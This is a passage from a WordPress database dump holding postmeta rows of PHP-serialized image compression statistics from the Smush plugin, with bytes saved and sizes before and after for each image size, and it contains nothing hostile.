stats\";a:8:{s:7:\"percent\";d:18.09140350350049430971921538002789020538330078125;s:5:\"bytes\";i:6021;s:11:\"size_before\";i:33281;s:10:\"size_after\";i:27260;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:419;s:11:\"size_before\";i:2373;s:10:\"size_after\";i:1954;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.309999999999998721023075631819665431976318359375;s:5:\"bytes\";i:1104;s:11:\"size_before\";i:5436;s:10:\"size_after\";i:4332;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:758;s:11:\"size_before\";i:4888;s:10:\"size_after\";i:4130;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1535;s:11:\"size_before\";i:9115;s:10:\"size_after\";i:7580;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:2205;s:11:\"size_before\";i:11469;s:10:\"size_after\";i:9264;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4066,2575,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.6747223364870418294003684422932565212249755859375;s:5:\"bytes\";i:4541;s:11:\"size_before\";i:38896;s:10:\"size_after\";i:34355;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:349;s:11:\"size_before\";i:2690;s:10:\"size_after\";i:2341;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:867;s:11:\"size_before\";i:6402;s:10:\"size_after\";i:5535;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:423;s:11:\"size_before\";i:5606;s:10:\"size_after\";i:5183;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:1137;s:11:\"size_before\";i:10793;s:10:\"size_after\";i:9656;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1765;s:11:\"size_before\";i:13405;s:10:\"size_after\";i:11640;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4067,2574,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.4672407338075625915507771424017846584320068359375;s:5:\"bytes\";i:3663;s:11:\"size_before\";i:29381;s:10:\"size_after\";i:25718;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:267;s:11:\"size_before\";i:2261;s:10:\"size_after\";i:1994;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:712;s:11:\"size_before\";i:4964;s:10:\"size_after\";i:4252;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:314;s:11:\"size_before\";i:4287;s:10:\"size_after\";i:3973;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:932;s:11:\"size_before\";i:8290;s:10:\"size_after\";i:7358;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1438;s:11:\"size_before\";i:9579;s:10:\"size_after\";i:8141;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4068,2573,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.8217117300264273893617428257130086421966552734375;s:5:\"bytes\";i:3078;s:11:\"size_before\";i:39352;s:10:\"size_after\";i:36274;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:272;s:11:\"size_before\";i:3048;s:10:\"size_after\";i:2776;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.3699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:629;s:11:\"size_before\";i:6714;s:10:\"size_after\";i:6085;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.13999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:229;s:11:\"size_before\";i:5533;s:10:\"size_after\";i:5304;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:649;s:11:\"size_before\";i:10944;s:10:\"size_after\";i:10295;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1299;s:11:\"size_before\";i:13113;s:10:\"size_after\";i:11814;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4069,2572,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.60987266253969352192143560387194156646728515625;s:5:\"bytes\";i:5802;s:11:\"size_before\";i:31177;s:10:\"size_after\";i:25375;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:347;s:11:\"size_before\";i:2112;s:10:\"size_after\";i:1765;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1055;s:11:\"size_before\";i:5018;s:10:\"size_after\";i:3963;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:561;s:11:\"size_before\";i:4408;s:10:\"size_after\";i:3847;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1676;s:11:\"size_before\";i:8921;s:10:\"size_after\";i:7245;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2163;s:11:\"size_before\";i:10718;s:10:\"size_after\";i:8555;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4070,2570,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.755913806132497256839997135102748870849609375;s:5:\"bytes\";i:4697;s:11:\"size_before\";i:43669;s:10:\"size_after\";i:38972;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:343;s:11:\"size_before\";i:2883;s:10:\"size_after\";i:2540;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:889;s:11:\"size_before\";i:6857;s:10:\"size_after\";i:5968;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:458;s:11:\"size_before\";i:6195;s:10:\"size_after\";i:5737;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1185;s:11:\"size_before\";i:12239;s:10:\"size_after\";i:11054;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1822;s:11:\"size_before\";i:15495;s:10:\"size_after\";i:13673;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4071,2568,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.60894264247755103269810206256806850433349609375;s:5:\"bytes\";i:5896;s:11:\"size_before\";i:27285;s:10:\"size_after\";i:21389;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:393;s:11:\"size_before\";i:2090;s:10:\"size_after\";i:1697;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1021;s:11:\"size_before\";i:4491;s:10:\"size_after\";i:3470;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.3299999999999982946974341757595539093017578125;s:5:\"bytes\";i:668;s:11:\"size_before\";i:3644;s:10:\"size_after\";i:2976;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.030000000000001136868377216160297393798828125;s:5:\"bytes\";i:1590;s:11:\"size_before\";i:7559;s:10:\"size_after\";i:5969;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2224;s:11:\"size_before\";i:9501;s:10:\"size_after\";i:7277;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4072,2567,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.454753722794958292752198758535087108612060546875;s:5:\"bytes\";i:5619;s:11:\"size_before\";i:26190;s:10:\"size_after\";i:20571;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:358;s:11:\"size_before\";i:1995;s:10:\"size_after\";i:1637;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.010000000000001563194018672220408916473388671875;s:5:\"bytes\";i:988;s:11:\"size_before\";i:4294;s:10:\"size_after\";i:3306;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:577;s:11:\"size_before\";i:3517;s:10:\"size_after\";i:2940;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.239999999999998436805981327779591083526611328125;s:5:\"bytes\";i:1499;s:11:\"size_before\";i:7407;s:10:\"size_after\";i:5908;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.469999999999998863131622783839702606201171875;s:5:\"bytes\";i:2197;s:11:\"size_before\";i:8977;s:10:\"size_after\";i:6780;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4073,2566,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.89280977452674648020547465421259403228759765625;s:5:\"bytes\";i:3430;s:11:\"size_before\";i:49762;s:10:\"size_after\";i:46332;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.78000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:481;s:11:\"size_before\";i:7096;s:10:\"size_after\";i:6615;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:876;s:11:\"size_before\";i:11365;s:10:\"size_after\";i:10489;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:705;s:11:\"size_before\";i:10348;s:10:\"size_after\";i:9643;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.53000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1368;s:11:\"size_before\";i:20953;s:10:\"size_after\";i:19585;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4074,2565,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.18704644093408973049008636735379695892333984375;s:5:\"bytes\";i:2952;s:11:\"size_before\";i:56911;s:10:\"size_after\";i:53959;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:251;s:11:\"size_before\";i:4189;s:10:\"size_after\";i:3938;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:679;s:11:\"size_before\";i:9932;s:10:\"size_after\";i:9253;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.779999999999999804600747665972448885440826416015625;s:5:\"bytes\";i:280;s:11:\"size_before\";i:7409;s:10:\"size_after\";i:7129;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.979999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:624;s:11:\"size_before\";i:15694;s:10:\"size_after\";i:15070;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1118;s:11:\"size_before\";i:19687;s:10:\"size_after\";i:18569;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4075,2564,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.9996812692566496849622126319445669651031494140625;s:5:\"bytes\";i:3953;s:11:\"size_before\";i:56474;s:10:\"size_after\";i:52521;s:4:\"time\";d:0.159999999999999975575093458246556110680103302001953125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:295;s:11:\"size_before\";i:4145;s:10:\"size_after\";i:3850;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:908;s:11:\"size_before\";i:9885;s:10:\"size_after\";i:8977;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:392;s:11:\"size_before\";i:7302;s:10:\"size_after\";i:6910;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:781;s:11:\"size_before\";i:15693;s:10:\"size_after\";i:14912;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:1577;s:11:\"size_before\";i:19449;s:10:\"size_after\";i:17872;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4076,2563,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.4166120576671037412097575725056231021881103515625;s:5:\"bytes\";i:6165;s:11:\"size_before\";i:73248;s:10:\"size_after\";i:67083;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:415;s:11:\"size_before\";i:4561;s:10:\"size_after\";i:4146;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1081;s:11:\"size_before\";i:11597;s:10:\"size_after\";i:10516;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:643;s:11:\"size_before\";i:9386;s:10:\"size_after\";i:8743;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1454;s:11:\"size_before\";i:20614;s:10:\"size_after\";i:19160;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2572;s:11:\"size_before\";i:27090;s:10:\"size_after\";i:24518;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4077,2562,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.43924838610513461389928124845027923583984375;s:5:\"bytes\";i:6703;s:11:\"size_before\";i:104096;s:10:\"size_after\";i:97393;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.94000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:407;s:11:\"size_before\";i:5861;s:10:\"size_after\";i:5454;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1104;s:11:\"size_before\";i:16185;s:10:\"size_after\";i:15081;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6;s:5:\"bytes\";i:844;s:11:\"size_before\";i:14076;s:10:\"size_after\";i:13232;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1824;s:11:\"size_before\";i:31268;s:10:\"size_after\";i:29444;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:2524;s:11:\"size_before\";i:36706;s:10:\"size_after\";i:34182;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4078,2561,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.00686498855835271371006456320174038410186767578125;s:5:\"bytes\";i:4620;s:11:\"size_before\";i:76912;s:10:\"size_after\";i:72292;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:398;s:11:\"size_before\";i:5354;s:10:\"size_after\";i:4956;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.88999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:930;s:11:\"size_before\";i:13501;s:10:\"size_after\";i:12571;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:474;s:11:\"size_before\";i:8869;s:10:\"size_after\";i:8395;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:944;s:11:\"size_before\";i:19969;s:10:\"size_after\";i:19025;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1874;s:11:\"size_before\";i:29219;s:10:\"size_after\";i:27345;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4079,2558,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.14904083473761264855284025543369352817535400390625;s:5:\"bytes\";i:7225;s:11:\"size_before\";i:117498;s:10:\"size_after\";i:110273;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:481;s:11:\"size_before\";i:6101;s:10:\"size_after\";i:5620;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.70000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1395;s:11:\"size_before\";i:18122;s:10:\"size_after\";i:16727;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:881;s:11:\"size_before\";i:14847;s:10:\"size_after\";i:13966;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1756;s:11:\"size_before\";i:34583;s:10:\"size_after\";i:32827;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.19000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:2712;s:11:\"size_before\";i:43845;s:10:\"size_after\";i:41133;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4080,2556,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.7131021580811118809606341528706252574920654296875;s:5:\"bytes\";i:4019;s:11:\"size_before\";i:59868;s:10:\"size_after\";i:55849;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:309;s:11:\"size_before\";i:3901;s:10:\"size_after\";i:3592;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:795;s:11:\"size_before\";i:9648;s:10:\"size_after\";i:8853;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:409;s:11:\"size_before\";i:8475;s:10:\"size_after\";i:8066;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.61000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:968;s:11:\"size_before\";i:17268;s:10:\"size_after\";i:16300;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.46999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1538;s:11:\"size_before\";i:20576;s:10:\"size_after\";i:19038;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4081,2555,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.3029777392309913608414717600680887699127197265625;s:5:\"bytes\";i:5744;s:11:\"size_before\";i:69180;s:10:\"size_after\";i:63436;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"kee